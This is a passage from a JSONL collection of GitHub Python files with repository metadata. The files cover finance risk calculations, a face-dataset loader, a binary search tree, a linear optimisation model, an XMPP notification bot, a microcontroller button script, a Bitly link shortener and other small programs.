in [asset_total, asset_average, asset_volatility, confidence_interval]):\n raise TypeError(\"All inputs must be numeric.\")\n \n # Check if conf_level is within range\n if not 0 < confidence_interval < 1:\n raise ValueError(\"Confidence level should fall within the range of 0 to 1.\")\n\n # Calculate the inverse of the cumulative distribution function\n inverse_cdf_value_at_risk = scipy.stats.norm.ppf(1 - confidence_interval)\n\n # Calculate the difference between the mean return and the product of the standard deviation and the inverse cdf\n diff_value_at_risk = asset_average - asset_volatility * inverse_cdf_value_at_risk\n\n # Calculate Value at Risk by multiplying the investment with the difference\n asset_value_at_risk = asset_total * diff_value_at_risk\n return asset_value_at_risk\n\ndef calculate_downside_risk(input_stock_prices: pandas.DataFrame, proportion, risk_free_ROR=0.005427) -> float:\n \"\"\"\n Calculate the downside risk of a portfolio given stock prices, proportions, and a risk-free rate of return.\n \n Parameters:\n - input_stock_prices: DataFrame containing stock prices.\n - proportion: Weights of the assets in the portfolio.\n - risk_free_ROR: Risk-free rate of return. Default is 0.005427.\n \n Returns:\n - float: The calculated downside risk.\n \"\"\"\n try:\n # Validate inputs\n _validate_downside_input(input_stock_prices, pandas.DataFrame, \"Data must be a Pandas DataFrame.\")\n _validate_downside_input(proportion, (pandas.Series, numpy.ndarray), \"Weights must be a pandas Series or numpy ndarray.\")\n _validate_downside_input(risk_free_ROR, (int, float, numpy.integer, numpy.floating), \"Risk-free rate must be an integer or float.\")\n\n # Compute weighted daily mean returns\n wtd_daily_mean = calculate_daily_return_proportioned(input_stock_prices, proportion)\n\n # Compute downside risk\n downside_risk = _compute_downside_risk(wtd_daily_mean, risk_free_ROR)\n\n return downside_risk\n except Exception as e:\n print(f\"An error occurred while calculating downside risk: {str(e)}\")\n return None\n\ndef _validate_downside_input(value, expected_type, error_message):\n \"\"\"\n Validate the input values for type consistency.\n \n Parameters:\n - value: The input value to validate.\n - expected_type: The expected type of the input value.\n - error_message: The error message to raise if validation fails.\n \"\"\"\n if not isinstance(value, expected_type):\n raise ValueError(error_message)\n\ndef _compute_downside_risk(wtd_daily_mean, risk_free_ROR):\n \"\"\"\n Compute the downside risk of a portfolio.\n \n Parameters:\n - wtd_daily_mean: Weighted daily mean returns.\n - risk_free_ROR: Risk-free rate of return.\n \n Returns:\n - float: The calculated downside risk.\n \"\"\"\n # Calculate the differences between the weighted daily mean and the risk-free rate of return\n differences = wtd_daily_mean - risk_free_ROR\n\n # Identify the negative returns (returns below the risk-free rate)\n negative_returns = numpy.minimum(0, differences)\n\n # Square the negative returns\n squared_negative_returns = negative_returns ** 2\n\n # Calculate the mean of the squared negative returns\n mean_squared_negative_returns = numpy.mean(squared_negative_returns)\n\n # Calculate the square root of the mean of the squared negative returns\n downside_risk = numpy.sqrt(mean_squared_negative_returns)\n\n # Return the downside risk\n return downside_risk\n","repo_name":"wasimnoordin/EntroPy","sub_path":"src/measures_risk.py","file_name":"measures_risk.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72348759413","text":"def fibonacci(aantal: int) -> list:\n lijst = [0,1]\n for i in range(aantal):\n lijst.append(lijst[i] + lijst[i + 1])\n snede = lijst[-1] / lijst[-2]\n return snede\n\nprint(fibonacci(50))\n\n\n\n \n \n\n\n \n\n","repo_name":"Ethiasdev/leren-programmeren","sub_path":"module_05/deel_01/opdracht_04/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5068156684","text":"import os, sys\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\nimport numpy as np\nimport cv2\nimport scipy\nfrom skimage.io import imread, imsave\nfrom skimage.transform import estimate_transform, warp, resize, rescale\nfrom glob import glob\nimport scipy.io\nfrom .utils import check_mkdir\n\nfrom . import detectors\n\ndef video2sequence(video_path):\n videofolder = video_path.split('.')[0]\n check_mkdir(videofolder)\n video_name = video_path.split('/')[-1].split('.')[0]\n vidcap = cv2.VideoCapture(video_path)\n success,image = vidcap.read()\n count = 0\n imagepath_list = []\n while success:\n imagepath = '{}/{}_frame{:04d}.jpg'.format(videofolder, video_name, count)\n cv2.imwrite(imagepath, image) # save frame as JPEG file\n success,image = vidcap.read()\n count += 1\n imagepath_list.append(imagepath)\n print('video frames are stored in {}'.format(videofolder))\n return imagepath_list\n\nclass TestData(Dataset):\n def __init__(self, testpath, iscrop=True, crop_size=224, scale=1.25, face_detector='mtcnn'):\n '''\n testpath: folder, imagepath_list, image path, video path\n '''\n if isinstance(testpath, list):\n self.imagepath_list = testpath\n elif os.path.isdir(testpath): \n self.imagepath_list = glob(testpath + '/*.jpg') + glob(testpath + '/*.png') + glob(testpath + '/*.bmp')\n elif os.path.isfile(testpath) and (testpath[-3:] in ['jpg', 'png', 'bmp']):\n self.imagepath_list = [testpath]\n elif os.path.isfile(testpath) and (testpath[-3:] in ['mp4', 'csv', 'vid', 'ebm']):\n self.imagepath_list = video2sequence(testpath)\n else:\n print(f'please check the test path: {testpath}')\n exit()\n print('total {} images'.format(len(self.imagepath_list)))\n self.imagepath_list = sorted(self.imagepath_list)\n self.crop_size = crop_size\n self.scale = scale\n self.iscrop = iscrop\n self.resolution_inp = crop_size\n if face_detector == 'fan':\n self.face_detector = detectors.FAN()\n # elif face_detector == 'mtcnn':\n # self.face_detector = detectors.MTCNN()\n else:\n print(f'please check the detector: {face_detector}')\n exit()\n\n def __len__(self):\n return len(self.imagepath_list)\n\n def bbox2point(self, left, right, top, bottom, type='bbox'):\n ''' bbox from detector and landmarks are different\n '''\n if type=='kpt68':\n old_size = (right - left + bottom - top)/2*1.1\n center = np.array([right - (right - left) / 2.0, bottom - (bottom - top) / 2.0 ])\n elif type=='bbox':\n old_size = (right - left + bottom - top)/2\n center = np.array([right - (right - left) / 2.0, bottom - (bottom - top) / 2.0 + old_size*0.12])\n else:\n raise NotImplementedError\n return old_size, center\n\n def __getitem__(self, index):\n imagepath = self.imagepath_list[index]\n imagename = imagepath.split('/')[-1].split('.')[0]\n\n image = np.array(imread(imagepath))\n if len(image.shape) == 2:\n image = image[:,:,None].repeat(1,1,3)\n if len(image.shape) == 3 and image.shape[2] > 3:\n image = image[:,:,:3]\n\n h, w, _ = image.shape\n if self.iscrop:\n # provide kpt as txt file, or mat file (for AFLW2000)\n kpt_matpath = imagepath.replace('.jpg', '.mat').replace('.png', '.mat')\n kpt_txtpath = imagepath.replace('.jpg', '.txt').replace('.png', '.txt')\n if os.path.exists(kpt_matpath):\n kpt = scipy.io.loadmat(kpt_matpath)['pt3d_68'].T \n left = np.min(kpt[:,0]); right = np.max(kpt[:,0]); \n top = np.min(kpt[:,1]); bottom = np.max(kpt[:,1])\n old_size, center = self.bbox2point(left, right, top, bottom, type='kpt68')\n elif os.path.exists(kpt_txtpath):\n kpt = np.loadtxt(kptpath)\n left = np.min(kpt[:,0]); right = np.max(kpt[:,0]); \n top = np.min(kpt[:,1]); bottom = np.max(kpt[:,1])\n old_size, center = self.bbox2point(left, right, top, bottom, type='kpt68')\n else:\n bbox, bbox_type = self.face_detector.run(image)\n if len(bbox) < 4:\n print('no face detected! run original image')\n left = 0; right = h-1; top=0; bottom=w-1\n else:\n left = bbox[0]; right=bbox[2]\n top = bbox[1]; bottom=bbox[3]\n old_size, center = self.bbox2point(left, right, top, bottom, type=bbox_type)\n size = int(old_size*self.scale)\n src_pts = np.array([[center[0]-size/2, center[1]-size/2], [center[0] - size/2, center[1]+size/2], [center[0]+size/2, center[1]-size/2]])\n else:\n src_pts = np.array([[0, 0], [0, h-1], [w-1, 0]])\n \n DST_PTS = np.array([[0,0], [0,self.resolution_inp - 1], [self.resolution_inp - 1, 0]])\n tform = estimate_transform('similarity', src_pts, DST_PTS)\n \n image = image/255.\n\n dst_image = warp(image, tform.inverse, output_shape=(self.resolution_inp, self.resolution_inp))\n dst_image = dst_image.transpose(2,0,1)\n return {'image': torch.tensor(dst_image).float(),\n 'imagename': imagename,\n # 'tform': tform,\n # 'original_image': torch.tensor(image.transpose(2,0,1)).float(),\n }","repo_name":"phantomKid13/3D-Face-Reconstruction","sub_path":"constructor/deca/decalib/datasets/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"1797574062","text":"class Node:\n def __init__(self, val):\n self.left = None\n self.val = val\n self.right = None\n\ndef preorder(root):\n if not root:\n return\n\n print(root.val, end=\" \")\n preorder(root.left)\n preorder(root.right)\n\ndef inorder(root):\n if not root:\n return\n\n inorder(root.left)\n print(root.val, end=\" \")\n inorder(root.right)\n\ndef inorder_iter(root):\n stack = [root]\n left = []\n\n while stack:\n ptr = stack[-1]\n if ptr.left and ptr not in left:\n stack.append(ptr.left)\n left.append(ptr)\n else:\n print(ptr.val, end=\" \")\n stack.pop()\n if ptr.right:\n stack.append(ptr.right)\n\n\ndef insert(root, val):\n if not root:\n return Node(val)\n\n if val > root.val:\n root.right = insert(root.right, val)\n if val < root.val:\n root.left = insert(root.left, val)\n\n return root\n\ndef inorder_predecessor(root):\n root = root.left\n\n while root and root.right:\n root = root.right\n\n return root\n\ndef inorder_successor(root):\n root = root.right\n\n while root and root.left:\n root = root.left\n\n return root\n\ndef delete(root, val):\n if not root:\n return \n\n if val > root.val:\n root.right = delete(root.right, val)\n elif val < root.val:\n root.left = delete(root.left, val)\n else:\n p = inorder_predecessor(root) or inorder_successor(root)\n\n if not p:\n return None\n\n root.val = p.val\n root.left = delete(root.left, p.val)\n root.right = delete(root.right, p.val)\n \n return root\n\nroot = Node(50)\ninsert(root, 10)\ninsert(root, 40)\ninsert(root, 20)\ninsert(root, 30)\ninorder(root)\nprint()\ninorder_iter(root)\n","repo_name":"agpranjal/algorithms","sub_path":"bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10137351561","text":"\"\"\"\nThis is the most basic implementation of MarketUp formulation.\n\nThis version uses PuLP as a modeling language and CBC as a solver.\n\nCreated by Rohit Karvekar (Aug, 22) for Mip Wise.\n\"\"\"\n\nimport pulp\n\n# Input Data\n# marketing channels\nmc = {1: 'Print', 2: 'TV', 3: 'SEO', 4: 'Social Media'}\nI = list(mc)\n# expected ROI\nr = {1: 1.16, 2: 1.09, 3: 1.06, 4: 1.14}\n# expected market penetration\np = {1: 2.1, 2: 2.5, 3: 3.0, 4: 0.9}\n# total budget\ntb = 1_000_000\n# print budget\npb = 100_000\n# viewer target\nvt = 1_500_000\n# minimum conventional channel allocation\nca = 0.4\n\n# Define the model\nmdl = pulp.LpProblem('market_up', sense=pulp.LpMaximize)\n\n# Add variables\nx = pulp.LpVariable.dicts(indices=I, cat=pulp.LpContinuous, name='x')\n\n# Add Constraints\n# C1) Can't exceed the total budget\nmdl.addConstraint(pulp.lpSum(x) <= tb, name='C1')\n# C2) Minimum allocation to conventional channels\nmdl.addConstraint(pulp.lpSum(x[i] for i in [1, 2]) >= ca * tb, name='C2')\n# C3) Can't exceed the print budget\nmdl.addConstraint(x[1] <= pb, name='C3')\n# C4) Social Media investment must be at most three times SEO investment\nmdl.addConstraint(x[4] <= 3 * x[3], name='C4')\n# C5) Reach minimum viewers target\nmdl.addConstraint(pulp.lpSum(p[i] * x[i] for i in I) >= vt, name='C5')\n\n# Set the objective function\ntotal_roi = pulp.lpSum(r[i] * x[i] for i in I)\nmdl.setObjective(total_roi)\n\n# Optimize\nmdl.solve()\n\n# Retrieve the solution\nx_sol = {mc[i]: int(x[i].value()) for i in I}\nprint(f'Total ROI: {total_roi.value()}')\nprint(f'Optimal budget allocation: {x_sol}')\n\n","repo_name":"mipwise/use-cases","sub_path":"marketup/scripts/marketup_pulp.py","file_name":"marketup_pulp.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41727702636","text":"__author__ = 'shaunjl'\n\n\"\"\"\nTastypie REST API tests for ResolveDOI(View)\n\n\"\"\"\nfrom tastypie.test import ResourceTestCase, TestApiClient\nfrom django.contrib.auth.models import User\nfrom hs_core import hydroshare\nfrom tastypie.serializers import Serializer\n\nclass TestResolveDOIView(ResourceTestCase):\n\n serializer = Serializer()\n\n def setUp(self):\n self.api_client = TestApiClient()\n user = hydroshare.create_account(\n 'shaun@gmail.com',\n username='user0',\n first_name='User0_FirstName',\n last_name='User0_LastName',\n )\n\n self.res = hydroshare.create_resource('GenericResource', user, 'myres')\n hydroshare.publish_resource(self.res.short_id)\n\n def tearDown(self):\n User.objects.all().delete()\n hydroshare.delete_resource(self.res.short_id)\n\n def test_get(self):\n\n url = 'hsapi/resolveDOI/{0}/'.format(self.res.doi)\n resp = self.api_client.get(url)\n\n self.assertValidJSONResponse(resp)\n\n resp_pk = self.deserialize(resp)\n\n self.assertEqual(self.res.short_id, resp_pk)\n\n def test_bad_doi(self):\n\n url = 'hsapi/resolveDOI/{0}/'.format('bad_doi')\n resp = self.api_client.get(url)\n\n self.assertEqual(resp.status_code, 404)\n","repo_name":"hydroshare/hs_core","sub_path":"tests/api/http/test_resolve_doi_view.py","file_name":"test_resolve_doi_view.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74403134771","text":"import speect\nimport speect.uttproc_cb # utterance callback interface\nimport speect.phoneset\n\n\ndef utt_processor(utt):\n # we require the word, segment and phrase relation \n word_rel = utt.relation_get(\"Word\")\n if word_rel is None:\n raise RuntimeError(\"Failed to find 'Word' relation of utterance\")\n\n segment_rel = utt.relation_get(\"Segment\")\n if segment_rel is None:\n raise RuntimeError(\"Failed to find 'Segment' relation of utterance\")\n\n phrase_rel = utt.relation_get(\"Phrase\")\n if phrase_rel is None:\n raise RuntimeError(\"Failed to find 'Phrase' relation of utterance\")\n\n # get phoneset from voice\n voice = utt.voice\n if voice is None:\n raise RuntimeError(\"Failed to find 'voice' of utterance\")\n \n phoneset = voice.data_get(\"phoneset\")\n if phoneset is None:\n raise RuntimeError(\"Failed to find 'phoneset' of voice\")\n \n # get silence phone\n silence_phone = phoneset.features[\"silence_phone\"]\n \n # Insert initial silence \n segment_item = segment_rel.head()\n if segment_item is None:\n silence_item = segment_rel.append()\n else:\n silence_item = segment_item.prepend()\n\n silence_item[\"name\"] = silence_phone\n\n # now go through phrases\n for phrase_item in phrase_rel:\n word_item = phrase_item.daughter(-1) # -1 for last daughter\n\n while word_item is not None:\n segment_item = word_item.path_to_item(\"R:SylStructure.daughtern.daughtern.R:Segment\")\n \n if segment_item is not None:\n silence_item = segment_item.append()\n silence_item[\"name\"] = silence_phone\n break\n \n word_item = word_item.prev()\n\n \n \n","repo_name":"mivoq/speect","sub_path":"swig/python/speect/modules/pause_processor.py","file_name":"pause_processor.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"34567961153","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport sys\n\nspeed=int(sys.argv[1])\n\npos_rbt=np.loadtxt('rbt.txt')\npos_cldr=np.loadtxt('cldr.txt')\nTT=len(pos_rbt)\n# pos_rbt=np.reshape(np.loadtxt('rbt.txt'),[TT,3])\n# pos_cldr=np.reshape(np.loadtxt('cldr.txt'),[TT,3])\n\nfig=plt.figure()\nax_sim=fig.add_subplot(111)\nax_sim.set_xlim([-10, 10])\nax_sim.set_ylim([-1, 10])\n\nax_sim.set_aspect('equal')\n\nr_radius=0.5\nc_radius=0.5\n\nrbt=plt.Circle(pos_rbt[0,0:2], radius=r_radius, fc=np.array([0,0,1]), alpha=1.0)\nrbt=ax_sim.add_patch(rbt)\n\nrbt_angle=(pos_rbt[0,2]*np.pi/180.0)\nrbt_lnx=(pos_rbt[0,0]+1.2*r_radius)*np.cos(pos_rbt[0,2]*np.pi/180.0)\nrbt_lny=(pos_rbt[0,0]+1.2*r_radius)*np.sin(pos_rbt[0,2]*np.pi/180.0)\nrbt_ln,=ax_sim.plot([pos_rbt[0,0],rbt_lnx], [pos_rbt[0,1], rbt_lny], linewidth=2.0, c=[0,0,0])\n\ncldr=plt.Circle(pos_cldr[0,0:2], radius=c_radius, fc=np.array([1,0,0]), alpha=1.0)\nax_sim.add_patch(cldr)\ncldr_angle=(pos_cldr[0,2]*np.pi/180.0)\ncldr_lnx=(1.2*c_radius)*np.cos(pos_cldr[0,2]*np.pi/180.0)\ncldr_lny=(1.2*c_radius)*np.sin(pos_cldr[0,2]*np.pi/180.0)\ncldr_ln,=ax_sim.plot([pos_cldr[0,0],pos_cldr[0,0]+cldr_lnx], [pos_cldr[0,1], pos_cldr[0,1]+cldr_lny], linewidth=2.0, c=[0,0,0])\n\ndef animate(t):\n if t==0:\n plt.waitforbuttonpress()\n if t*speed%100==0:\n print(t*speed)\n\n rbt.center=pos_rbt[speed*t,0],pos_rbt[speed*t,1]\n print(pos_rbt[t,0:2])\n\n pt_x=(1.2*r_radius)*np.cos(pos_rbt[speed*t,2]*np.pi/180.0)\n pt_y=(1.2*r_radius)*np.sin(pos_rbt[speed*t,2]*np.pi/180.0)\n rbt_ln.set_data([pos_rbt[speed*t,0], pos_rbt[speed*t,0]+pt_x], [pos_rbt[speed*t,1], pos_rbt[speed*t,1]+pt_y])\n \n cldr.center=pos_cldr[speed*t,0],pos_cldr[speed*t,1]\n pt_x=(1.2*c_radius)*np.cos(pos_cldr[speed*t,2]*np.pi/180.0)\n pt_y=(1.2*c_radius)*np.sin(pos_cldr[speed*t,2]*np.pi/180.0)\n cldr_ln.set_data([pos_cldr[speed*t,0], pos_cldr[speed*t,0]+pt_x], [pos_cldr[speed*t,1], pos_cldr[speed*t,1]+pt_y])\n\n # for i in np.arange(len(agents)):\n # agents[i].center=pos[speed*t,i,0],pos[speed*t,i,1]\n # # print du_min, du_max, pos[speed*t,i,2]\n # c=(pos[speed*t,i,2]-du_min)/(du_max-du_min+0.001)\n # agents[i].set_fc((0,c,c))\n # return rbt_ln,\n\nline_ani = animation.FuncAnimation(fig, animate, frames=int(TT/speed), interval=5, blit=False, repeat=False)\n\nplt.show()","repo_name":"ccimrie/DeepDECS","sub_path":"case_studies/mobile_robot_collision_limitation/simulator/visualiser/waypoint.py","file_name":"waypoint.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27800025975","text":"#BruteForce - 분해합(decompose sum)\n\nn = int(input())\nresult = 0\n \nfor i in range(n+1):\n digit = list(map(int, str(i))) #build a list with integer nums\n if(sum(digit) + i == n):\n result = i\n break\nprint(result)\n","repo_name":"dasollee2525/Baekjoon-Algorithm","sub_path":"BruteForce/2231.py","file_name":"2231.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9644621571","text":"import csv\nimport os\n\nos.chdir(\"/Users/stefanslater/Desktop/Reasoning Mind\")\n\nwith open(\"Pre-survey AY 16-17.csv\",\"rU\") as f:\n d = list(csv.reader(f))\n \n# removing students who failed to answer all questions.\n\ndroprows = []\nfor n,li in enumerate(d):\n if \"NA\" in li[3:]:\n droprows.append(n)\n \ndroprows.sort(reverse=True)\n\nfor i in droprows:\n del d[i] \n\n# removing questions that we are no longer using: 6, 13, 14\ndropcols = ['Q6','Q13','Q14','Grade','Timestamp']\nnewd = []\nwriter = csv.writer(open(\"20170915_ReasMindLCAInput.csv\",\"wb\"))\nfor li in d[1:]:\n newd.append([x for n,x in enumerate(li) if d[0][n] not in dropcols])\n \nfor li in newd:\n for n,x in enumerate(li[1:]):\n if int(x) >= 3:\n li[n+1] = 1\n else:\n li[n+1] = 0\n writer.writerow(li)","repo_name":"cjc2238/Assistments-Competition","sub_path":"Stefan Reresources/2016119_Data_Processing.py","file_name":"2016119_Data_Processing.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32684670546","text":"#!/usr/bin/env python3\n########################################################################\n# File name: pushbot.py\n# This file is part of: aioxmpp\n#\n# LICENSE\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program. If not, see\n# .\n#\n########################################################################\nimport asyncio\nimport json\nimport logging\nimport pathlib\nimport socket\nimport signal\n\nimport toml\n\nimport aioxmpp\n\n\nclass MessageProtocol(asyncio.DatagramProtocol):\n def __init__(self, queue):\n super().__init__()\n self.logger = logging.getLogger(type(self).__name__)\n self.queue = queue\n\n def datagram_received(self, data, addr):\n try:\n parsed = json.loads(data.decode(\"utf-8\"))\n except Exception:\n self.logger.error(\"failed to parse client message %r\",\n data,\n exc_info=True)\n return\n\n try:\n self.queue.put_nowait(parsed)\n except asyncio.QueueFull:\n self.logger.error(\"input queue full! dropped message %r\",\n parsed)\n\n\nasync def process_item(item, rooms, logger):\n target_rooms = rooms.keys()\n\n tokens = []\n\n for room_address in target_rooms:\n try:\n room_info = rooms[room_address]\n except KeyError:\n continue\n\n body_parts = []\n\n if room_info[\"head_format\"]:\n body_parts.append(\n room_info[\"head_format\"].format(\n nitems=len(item[\"items\"]),\n root_item=item,\n )\n )\n\n for sub_item in item[\"items\"]:\n required_fields = room_info[\"required_fields\"]\n if required_fields:\n item_fields = set(sub_item.keys()) & required_fields\n if len(item_fields) < len(required_fields):\n continue\n\n format_ = room_info[\"format\"]\n if format_:\n body = format_.format(**sub_item)\n else:\n body = repr(item)\n\n body_parts.append(body)\n\n msg = aioxmpp.Message(\n type_=aioxmpp.MessageType.GROUPCHAT,\n )\n msg.body[None] = \"\\n\".join(body_parts)\n\n tokens.append(asyncio.ensure_future(\n room_info[\"room\"].send_message(msg)\n ))\n\n if not tokens:\n logger.warning(\"item %r generated no message!\", item)\n return\n\n await asyncio.wait(tokens, return_when=asyncio.ALL_COMPLETED)\n\n\nasync def process_queue(queue, rooms):\n logger = logging.getLogger(\"processor\")\n\n while True:\n item = await queue.get()\n try:\n await process_item(item, rooms, logger)\n except Exception:\n logger.error(\"failed to process item!\", exc_info=True)\n continue\n\n\nasync def amain(loop, xmpp_cfg, unix_cfg, mucs):\n message_queue = asyncio.Queue(maxsize=16)\n message_handler = MessageProtocol(message_queue)\n\n sigint_received = asyncio.Event()\n sigint_future = asyncio.ensure_future(sigint_received.wait())\n\n loop.add_signal_handler(signal.SIGINT, sigint_received.set)\n loop.add_signal_handler(signal.SIGTERM, sigint_received.set)\n\n socket_path, = unix_cfg\n\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM, 0)\n sock.bind(str(socket_path))\n\n unix_transport, _ = await loop.create_datagram_endpoint(\n lambda: message_handler,\n sock=sock,\n )\n\n address, password = xmpp_cfg\n\n xmpp_client = aioxmpp.Client(\n address,\n aioxmpp.make_security_layer(password)\n )\n\n muc_client = xmpp_client.summon(aioxmpp.MUCClient)\n\n try:\n async with xmpp_client.connected() as stream:\n rooms = {}\n for muc_info in mucs:\n room, fut = muc_client.join(\n muc_info[\"address\"],\n muc_info[\"nickname\"],\n autorejoin=True,\n )\n\n await fut\n muc_info[\"room\"] = room\n rooms[muc_info[\"address\"]] = muc_info\n\n processor = asyncio.ensure_future(process_queue(\n message_queue,\n rooms\n ))\n\n done, pending = await asyncio.wait(\n [\n processor,\n sigint_future,\n ],\n return_when=asyncio.FIRST_COMPLETED,\n )\n\n if sigint_future in done:\n if not processor.done():\n processor.cancel()\n try:\n await processor\n except asyncio.CancelledError:\n pass\n return\n\n if processor in done:\n processor.result()\n raise RuntimeError(\"processor exited early!\")\n finally:\n if not sigint_future.done():\n sigint_future.cancel()\n unix_transport.close()\n\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-c\", \"--config\",\n type=pathlib.Path,\n default=pathlib.Path.cwd() / \"config.toml\",\n help=\"Path to config file (default: ./config.toml)\"\n )\n parser.add_argument(\n \"-v\", \"--verbose\",\n default=0,\n dest=\"verbosity\",\n action=\"count\",\n help=\"Increase verbosity (up to -vvv)\"\n )\n\n args = parser.parse_args()\n\n logging.basicConfig(\n level={\n 0: logging.ERROR,\n 1: logging.WARNING,\n 2: logging.INFO,\n }.get(args.verbosity, logging.DEBUG)\n )\n\n with args.config.open(\"r\") as f:\n config = toml.load(f)\n\n address = aioxmpp.JID.fromstr(config[\"xmpp\"][\"account\"])\n password = config[\"xmpp\"][\"password\"]\n\n socket_path = pathlib.Path(config[\"unix\"][\"path\"])\n\n mucs = []\n for muc_cfg in config[\"xmpp\"][\"muc\"]:\n mucs.append(\n {\n \"address\": aioxmpp.JID.fromstr(muc_cfg[\"address\"]),\n \"nickname\": muc_cfg.get(\"nickname\", address.localpart),\n \"format\": muc_cfg.get(\"format\"),\n \"required_fields\": frozenset(muc_cfg.get(\"required_fields\", [])),\n \"head_format\": muc_cfg.get(\"head_format\"),\n }\n )\n\n if socket_path.exists():\n if not socket_path.is_socket():\n raise RuntimeError(\"{} exists and is not a socket!\".format(\n socket_path,\n ))\n\n # FIXME: do not unlink the socket if it’s still live; abort instead.\n socket_path.unlink()\n\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(amain(\n loop,\n (address, password),\n (socket_path, ),\n mucs,\n ))\n finally:\n loop.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"horazont/aioxmpp","sub_path":"examples/pushbot.py","file_name":"pushbot.py","file_ext":"py","file_size_in_byte":7439,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"21"} +{"seq_id":"3185111123","text":"# ESP8266 LED Button\n# micropython exercise\n#\n\nimport machine\nimport time\n\nLED_PIN = 5\nBUTTON_PIN = 14\n\nled = machine.Pin(LED_PIN, machine.Pin.OUT)\nbutton = machine.Pin(BUTTON_PIN, machine.Pin.IN, machine.Pin.PULL_UP)\n\nwhile True:\n\n # The value function returns the current level of the pin,\n # either 1 for a high logic level or 0 for a low logic level.\n # Notice how the button is at a high level (value returns 1) when\n # it's not pressed. This is because the pull-up resistor keeps the pin at\n # a high level when it's not connected to ground through the button.\n # When the button is pressed then the input pin connects to ground\n # and reads a low level (value returns 0).\n if not button.value():\n led.on()\n else:\n led.off()\n\n time.sleep(.1)\n","repo_name":"SERC-Lv3IT-Unit19-Labs/Lab-ESP8266-Button","sub_path":"micropython/LEDbutton.py","file_name":"LEDbutton.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32761445746","text":"import os\nimport requests\nimport argparse\n\nfrom urllib.parse import urlparse\nfrom dotenv import load_dotenv\n\n\n\ndef shorten_link(token, url) :\n\n bitly_url = 'https://api-ssl.bitly.com/v4/shorten'\n \n headers = {'Authorization': 'Bearer {}'.format(token)}\n\n payload = {'long_url': url}\n \n response = requests.post(bitly_url, headers=headers, json=payload)\n \n response.raise_for_status()\n \n return response.json()['id']\n\n\ndef count_clicks(token, url):\n\n divided_url = urlparse(url)\n\n bitly_url = f'https://api-ssl.bitly.com/v4/bitlinks/{divided_url.netloc}{divided_url.path}/clicks/summary'\n \n headers = {'Authorization': 'Bearer {}'.format(token)}\n \n response = requests.get(bitly_url, headers=headers)\n \n response.raise_for_status()\n \n return response.json()['total_clicks']\n\n\ndef is_bitlink(url, api_key): \n\n divided_url = urlparse(url)\n\n bitly_url = f'https://api-ssl.bitly.com/v4/bitlinks/{divided_url.netloc}{divided_url.path}'\n \n headers = {'Authorization': 'Bearer {}'.format(api_key)}\n \n response = requests.get(bitly_url, headers=headers)\n \n return response.ok\n\n \nif __name__ == '__main__':\n \n load_dotenv()\n \n parser = argparse.ArgumentParser(\n description='Программа сокращает ссылки и считает кол-во переходов по ней'\n )\n\n parser.add_argument('link', help='Ваша ссылка')\n\n args = parser.parse_args()\n\n api_key = os.environ['BITLY_API_KEY']\n \n response_ok = is_bitlink(args.link, api_key)\n\n try :\n\n if not response_ok :\n \n print('Битлинк: ', shorten_link(api_key, args.link))\n\n else: \n\n print('По вашей ссылке прошли: {} раз(а)'.format(count_clicks(api_key, args.link)))\n \n except requests.exceptions.HTTPError as err:\n \n print(\"Во время выполнения произошла ошибка, статус ответа:\", err)\n\n \n\n \n\n\n","repo_name":"Evdokimov11/api_short_links_count","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13328189035","text":"def wrap_line(line, wlen, indent=2):\n \"\"\"Wrap a line at the last space before a specified length.\n \n NOTE: this goes WRONG for if words longer than wlen are present.\n \n Parameters:\n line (str): Line to wrap.\n wlen (int): Maximum line length to wrap at.\n indent (int): Indentation of the continuation line\n \n Returns:\n (str): The line with extra '\\n' characters.\n \"\"\"\n \n llen = len(line)\n \n # No need to break:\n if wlen >= llen: return line\n \n i0 = 0 # Base position\n il = wlen # Move between i0 and i0+wlen\n dl = -1 # Move backwards by default\n wraps = 0\n \n while True:\n # 